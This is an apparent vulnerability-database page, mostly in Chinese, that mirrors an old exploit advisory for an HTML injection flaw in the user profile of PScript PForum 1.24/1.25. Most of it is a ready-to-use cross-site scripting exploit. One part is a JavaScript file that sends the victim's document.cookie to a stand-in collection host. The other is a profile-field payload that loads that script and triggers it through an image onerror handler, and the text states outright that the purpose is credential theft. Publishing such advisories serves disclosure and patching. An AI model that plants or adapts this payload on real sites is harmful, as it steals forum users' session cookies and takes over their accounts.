PScript PForum 1.24/1.25 – User Profile HTML Injection

PScript PForum 1.24/1.25 – User Profile HTML Injection

漏洞ID 1054525 漏洞类型
发布时间 2004-07-16 更新时间 2004-07-16
图片[1]-PScript PForum 1.24/1.25 – User Profile HTML Injection-安全小百科CVE编号 N/A
图片[2]-PScript PForum 1.24/1.25 – User Profile HTML Injection-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24373
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10954/info

PScript PForum is reported prone to a HTML injection vulnerability. The vulnerability presents itself due to a lack of sufficient sanitization performed on data submitted through input fields of the PForum user profile form.

This could be exploited to steal cookie-based authentication credentials. It is also possible to use this type of vulnerability as an attack vector to exploit latent browser security flaws.

Create a Javascript file and save it as bad.js (your domain name is in this
case example.com). The file contains the following code:

// bad.js
function b()
{
location.href='example.org/compute_stolen_data.ext?'+document.cookie;
}

Edit your profile and enter the following line into the IRC Server or AIM
ID Input Box. The string have to be shorter then 100 characters.

// Input Box (without line break)
"><script src=http://example.com/bad.js></script>
<img height=0 width=0 src=foo onerror=b(); >

相关推荐: HP CIFS 9000 Arbitrary Password Changing Vulnerability

HP CIFS 9000 Arbitrary Password Changing Vulnerability 漏洞ID 1102944 漏洞类型 Environment Error 发布时间 2001-08-29 更新时间 2001-08-29 CVE编号 N…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享